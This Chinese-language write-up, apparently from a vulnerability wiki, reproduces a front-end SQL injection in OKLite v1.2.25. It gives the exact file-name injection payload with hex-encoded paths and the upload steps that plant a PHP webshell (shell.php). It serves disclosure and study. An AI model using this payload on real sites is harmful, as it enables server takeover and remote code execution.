001-OKLite v1.2.25 SQL注入导致getshell(前台)

# OKLite v1.2.25 SQL注入导致getshell(前台)

### 一、漏洞简介

这个漏洞在2017年在PHPOK当中就被畅师傅就被发现了。PHPOK系统被修复了,但是在OKLite当中还存在。

### 二、漏洞影响

OKLite v1.2.25 版本

### 三、复现过程

地址:`http://url/index.php?id=message`

在线留言处上传一个图片并抓包,把文件名修改为:

“`bash
1′,’pf3qm0js3gb2s5f33r7lf14vl3′,’30’),(‘1′,0x7265732f3230313931302f30342f,’shell.jpg’,’jpg’,0x7265732f3230313931302f30352f7368656c6c2e706870,’1570161575′,’abc
“`

![](/static/lingzu/images/15891973346961.png)

上传成功之后会返回图片的id和保存的路径:

![](/static/lingzu/images/15891973425591.png)

再次上传一个图片,把地址中的save改成replace,添加一个参数名为oldid,值为图片的id + 1。

图片的内容改为恶意的php代码:

![](/static/lingzu/images/15891973498121.png)

上传完成之后可在res\201910\05目录下生成一个shell.php

![](/static/lingzu/images/15891973575395.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容